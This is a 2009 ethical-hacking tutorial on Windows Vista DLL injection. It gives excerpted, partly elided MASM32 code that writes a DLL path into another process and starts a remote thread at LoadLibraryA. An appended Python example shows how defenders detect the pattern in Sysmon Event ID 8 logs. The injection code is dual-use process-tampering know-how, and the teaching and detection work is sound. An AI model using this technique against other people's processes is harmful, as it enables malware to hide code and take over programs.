Title: Hacking
Description: Complete notes on Windows Vista DLL injection (ethical hacking)



Title: Win Vista DLL Injection (32bit)
Date: January 25th 2009
Website: http://www ... com
Author: Nicolaou George
Mail: ishtus<\at>astalavista<\d0t>com


Table of Contents
Introduction
...
3
Code
...
8
ASLR and LoadLibrary
...
8
Finally
...

The sample code used is written in assembly language (MASM32) using the WinAsm IDE
...


Tools
The tools used in this paper are the following:
- WinAsm Studio [http://www ... net/]

Code
injectDLL
...
486

...
inc


...
if uMsg == WM_COMMAND

...
elseif wParam == EXIT
invoke EndDialog,hWin,0
;////////////////////////////////////Open File Dialog//////////////////////////////////////////////////////////

...
lStructSize,SIZEOF ofn
mov ofn ... lpstrFile,offset lib
mov ofn ... Flags,OFN_FILEMUSTEXIST+OFN_PATHMUSTEXIST+OFN_LONGNAMES+OFN_EXPLORER+OFN_HIDEREADONLY
invoke GetOpenFileName,addr ofn

...
endif
;/////////////////////////////////////////////////////////////////////////////////////////////////////////////

...
elseif uMsg == WM_CLOSE
invoke EndDialog,hWin,0

...
if eax == 0
; If no PID inserted then use current process PID
invoke GetCurrentProcessId

...
endif
mov hProcId,eax

...
endif
invoke OpenProcess,PROCESS_QUERY_INFORMATION+PROCESS_CREATE_THREAD+PROCESS_VM_OPERATION+PROCESS_VM_WRITE,0,hProcId ;Open process from PID

...
endif
mov hProcId,eax

;////Calculate bytes needed to allocate for library pathname/////////////
invoke lstrlen,addr lib
inc eax
mov libstrlen,eax
;///////////////////////////////////////////////////////////////////////
;Allocate memory to write dll pathname
invoke VirtualAllocEx,hProcId,0,libstrlen,MEM_COMMIT,PAGE_READWRITE

...
endif
mov ipbase,eax

invoke WriteProcessMemory,hProcId,ipbase,addr lib,libstrlen,0 ; Write dll pathname to allocated memory

...
endif
;Get address of kernel32 in memory (ASLR friendly)
invoke GetModuleHandle,addr krn32
mov pfnRtn,eax
;Get address of LoadLibraryA
invoke GetProcAddress, pfnRtn,addr llib

...
endif
mov pfnRtn,eax

;Create remote thread and load our dll using LoadLibraryA
invoke CreateRemoteThread,hProcId,NULL,0,pfnRtn,ipbase,0,NULL

...
endif
Ret
InjectDll EndP
;a quick fix of masm32
...
while eax != 0
xor edx, edx
mov dl, byte ptr [edi]
sub dl, "0" ; subtract "0" from each digit to convert it to its numeric value
mov esi, eax
dec esi
push eax
mov eax, edx
push ebx
mov ebx, 10

...
pop ebx
add ecx, eax
pop eax
inc edi
dec eax

...
endw

...
inc
include windows ... inc
include kernel32 ... inc
;------------------------------------------------------------------------------------------------------------------------
includelib user32 ... lib
includelib comdlg32 ... lib

...
data
krn32 db "kernel32",0
llib db "LoadLibraryA",0
error0 db "Error",0
; Open file dialog
strFilter db "Dynamic Libraries (*
...
dll",0,"All Files",0,"*
...

...
data?
hInstance dd ?
hProcId HANDLE ?
libstrlen dd ?
hProcIdb db 5 dup(?)
lib db 512 dup(?)
errormsg db 512 dup(?)
;Open file dialog
ofn OPENFILENAME <>
;------------------------------------------------------------------------------------------------------------------------
injectDLL
...
",SELECT,"Button",0x50010000,133,23,21,13,0x00000000
END

7

Why Remote Thread?
The idea behind using a remote thread to inject a dynamic library is to create a new thread in a remote process that calls the LoadLibrary API and loads our DLL inside the address space of that remote process
...
To overcome this problem we need to find the offset of LoadLibrary inside the address space layout of our process
...
dll (which contains the LoadLibrary procedure) might change, we use GetModuleHandle and GetProcAddress to retrieve the address of LoadLibraryA, which will be the same in the remote process's address space
...
We therefore have to call VirtualAllocEx to allocate memory in the remote process and then write the pathname of the DLL we intend to inject into that memory
...


Finally
When everything is done we can call CreateRemoteThread and pass the arguments for injecting the DLL (see code)
...
The rest is up to you
...
enjoy
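From the defender's side, the sequence above leaves a distinctive trace: a thread created in another process whose entry point is LoadLibraryA inside kernel32.dll, which is what Sysmon records as Event ID 8 (CreateRemoteThread) with its SourceImage, TargetImage, StartModule and StartFunction fields. The Python below is an added detection example, not code from the paper; the log lines are constructed in that field layout with made-up paths, and it also matches the W and Ex variants of LoadLibrary, which the paper does not use.

```python
# Added detection example (not from the paper): flag cross-process threads that
# start at a LoadLibrary* export of kernel32.dll, the signature of the
# VirtualAllocEx / WriteProcessMemory / CreateRemoteThread sequence above.

# Constructed sample records laid out like Sysmon Event ID 8 fields; paths are made up.
SAMPLE_EVENTS = [
    "SourceImage: C:\\Tools\\injectDLL.exe | TargetImage: C:\\Windows\\System32\\notepad.exe"
    " | StartModule: C:\\Windows\\System32\\kernel32.dll | StartFunction: LoadLibraryA",
    # The paper's tool falls back to its own PID when none is typed in: not cross-process.
    "SourceImage: C:\\Tools\\injectDLL.exe | TargetImage: C:\\Tools\\injectDLL.exe"
    " | StartModule: C:\\Windows\\System32\\kernel32.dll | StartFunction: LoadLibraryA",
    # Ordinary thread creation with an unrelated entry point.
    "SourceImage: C:\\Windows\\System32\\svchost.exe | TargetImage: C:\\Program Files\\App\\app.exe"
    " | StartModule: C:\\Windows\\System32\\ntdll.dll | StartFunction: RtlUserThreadStart",
]

# LoadLibraryA is what the paper resolves; the other exports achieve the same load.
LOADER_EXPORTS = {"LoadLibraryA", "LoadLibraryW", "LoadLibraryExA", "LoadLibraryExW"}


def parse_event(line):
    """Split one 'Key: value | Key: value' record into a dict."""
    fields = {}
    for part in line.split(" | "):
        key, _, value = part.partition(": ")
        fields[key.strip()] = value.strip()
    return fields


def is_loadlibrary_injection(event):
    """True when another process started a thread at kernel32!LoadLibrary* in this one."""
    source = event.get("SourceImage", "").lower()
    target = event.get("TargetImage", "").lower()
    if not source or source == target:
        return False  # a thread a process creates in itself is not remote injection
    module = event.get("StartModule", "").lower().rsplit("\\", 1)[-1]
    return module == "kernel32.dll" and event.get("StartFunction") in LOADER_EXPORTS


def find_injections(lines):
    """Return the parsed events that match the LoadLibrary remote-thread pattern."""
    return [e for e in map(parse_event, lines) if is_loadlibrary_injection(e)]


if __name__ == "__main__":
    for hit in find_injections(SAMPLE_EVENTS):
        print(f"{hit['SourceImage']} injected into {hit['TargetImage']} via {hit['StartFunction']}")
```

Only the first constructed record is reported; the self-targeted thread and the ntdll-started thread are left alone.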